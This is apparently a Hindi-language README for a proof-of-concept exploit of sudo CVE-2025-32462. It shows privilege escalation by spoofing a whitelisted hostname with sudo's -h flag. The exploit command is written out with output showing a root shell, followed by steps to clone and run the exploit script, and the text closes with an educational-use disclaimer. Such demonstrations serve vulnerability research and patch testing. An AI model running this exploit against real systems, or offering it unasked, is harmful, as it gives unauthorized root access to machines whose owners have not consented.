
CVE-2025-32462 के लिए PoC एक्सप्लॉइट, होस्टनाम स्पूफिंग के माध्यम से sudo प्रिविलेज एस्केलेशन। कमजोर सिस्टम (< 1.9.17) पर रूट एक्सेस प्राप्त करने के लिए होस्टनाम-आधारित प्रतिबंधों को बायपास करने का प्रदर्शन करता है।
होस्टनाम स्पूफिंग विशेषाधिकार वृद्धि (CVE-2025-32462)
"आप नीली गोली लेते हैं... कहानी खत्म होती है। आप लाल गोली लेते हैं... आपको रूट मिलता है।"
यह एक्सप्लॉइट sudo (CVE-2025-32462) में एक विशेषाधिकार वृद्धि कमजोरी प्रदर्शित करता है जहां -h फ्लैग का उपयोग करके होस्टनाम-आधारित प्रतिबंधों को दरकिनार किया जा सकता है। पीओसी एक प्रतिबंधित उपयोगकर्ता वातावरण बनाता है, फिर एक श्वेतसूचीबद्ध होस्टनाम को स्पूफ करके उससे बचकर रूट एक्सेस प्राप्त करता है।
[user@matrix-node]$ sudo -h zion-core bash # Spoof whitelisted hostname
[root@matrix-node]# id # Got root on wrong hostname!
uid=0(root) gid=0(root) groups=0(root)
रिपॉजिटरी क्लोन करें:
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape
निष्पादन योग्य बनाएं और चलाएं:
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh
प्रदर्शित करने के लिए इंटरैक्टिव प्रॉम्प्ट का पालन करें:
केवल शैक्षिक/अनुसंधान उद्देश्यों के लिए। केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की अनुमति है।